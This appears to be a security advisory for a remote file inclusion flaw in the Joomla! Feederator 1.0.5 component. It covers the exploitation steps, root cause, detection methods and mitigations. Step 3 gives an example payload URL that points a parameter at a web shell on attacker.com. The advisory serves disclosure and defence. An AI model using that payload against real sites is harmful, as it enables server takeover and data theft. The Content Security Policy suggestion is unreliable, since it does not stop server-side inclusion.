Source: cve@mitre.org
Multiple PHP remote file inclusion vulnerabilities in the Recly Interactive Feederator (com_feederator) component 1.0.5 for Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the (1) mosConfig_absolute_path parameter to (a) add_tmsp.php, (b) edit_tmsp.php and (c) tmsp.php in includes/tmsp/; and the (2) GLOBALS[mosConfig_absolute_path] parameter to (d) includes/tmsp/subscription.php.
Recly Interactive Feederator (com_feederator) component for Joomla! versions 1.0.5 is vulnerable to remote file inclusion (RFI), allowing attackers to execute arbitrary PHP code on the server. This vulnerability stems from improper input validation, enabling attackers to inject malicious code through crafted URLs, potentially leading to complete system compromise.
Step 1: Crafting the Malicious Payload: The attacker creates a malicious PHP script (e.g., a web shell) and hosts it on a publicly accessible server.
Step 2: Identifying the Vulnerable URL: The attacker identifies the Joomla! installation and the vulnerable component (com_feederator version 1.0.5).
Step 3: Exploiting the RFI Vulnerability: The attacker crafts a URL that exploits the RFI vulnerability. This URL includes the mosConfig_absolute_path or GLOBALS[mosConfig_absolute_path] parameter, pointing to the attacker's malicious PHP script. For example: index.php?option=com_feederator&mosConfig_absolute_path=http://attacker.com/malicious.php or similar variations depending on the vulnerable file.
Step 4: Code Execution: When the vulnerable PHP file attempts to include the specified file, the attacker's malicious PHP code is executed on the server.
Step 5: Gaining Control: The attacker uses the executed code (e.g., the web shell) to gain control of the server, potentially leading to data exfiltration, further exploitation, or complete system compromise.
The vulnerability arises from the lack of proper input validation in the Recly Interactive Feederator component. Specifically, the component uses the mosConfig_absolute_path and GLOBALS[mosConfig_absolute_path] variables to include files without sanitizing the user-supplied input. This allows an attacker to specify a URL pointing to a malicious PHP script hosted on a remote server. When the vulnerable PHP files (add_tmsp.php, edit_tmsp.php, tmsp.php, and subscription.php) attempt to include the attacker-controlled file, the malicious code is executed within the context of the Joomla! application, granting the attacker control over the server. The root cause is the failure to validate and sanitize user-provided input used in the include or require functions, leading to code injection.
While no specific APTs are definitively linked to this specific CVE, the nature of the vulnerability makes it attractive to a wide range of attackers, including those seeking to establish a foothold on a server for further attacks. This type of vulnerability is often used by botnets and opportunistic attackers. Not in CISA KEV.
Web server access logs: Look for suspicious requests containing URLs with the mosConfig_absolute_path or GLOBALS[mosConfig_absolute_path] parameters, especially if they point to external domains or unusual file extensions (e.g., .php).
Intrusion Detection Systems (IDS): Configure IDS rules to detect RFI attempts, specifically those targeting the vulnerable component and using the identified parameters.
File Integrity Monitoring (FIM): Monitor critical Joomla! files for unauthorized modifications, especially those related to the vulnerable component.
Network traffic analysis: Analyze network traffic for unusual outbound connections from the web server, which could indicate command and control (C2) communication or data exfiltration.
Web application firewall (WAF) logs: Review WAF logs for blocked requests that match RFI attack patterns.
Upgrade to a patched version of the Recly Interactive Feederator component or remove the component entirely if not needed. Consider removing the component as a primary mitigation strategy since the component is old and likely no longer maintained.
Implement input validation and sanitization: Ensure that all user-supplied input is properly validated and sanitized before being used in file inclusion operations. Specifically, validate the mosConfig_absolute_path and GLOBALS[mosConfig_absolute_path] parameters to ensure they point to local files only and do not contain malicious code.
Disable or restrict the use of the include and require functions: If possible, restrict the use of these functions to only trusted files and directories.
Use a Web Application Firewall (WAF): Deploy a WAF to filter malicious traffic and block RFI attempts.
Keep Joomla! and all installed components up-to-date: Regularly update Joomla! and all installed components to the latest versions to patch known vulnerabilities.
Implement a strong Content Security Policy (CSP): Configure a CSP to restrict the sources from which the browser can load resources, mitigating the impact of successful RFI exploits.
Regularly scan the web server for malware and vulnerabilities.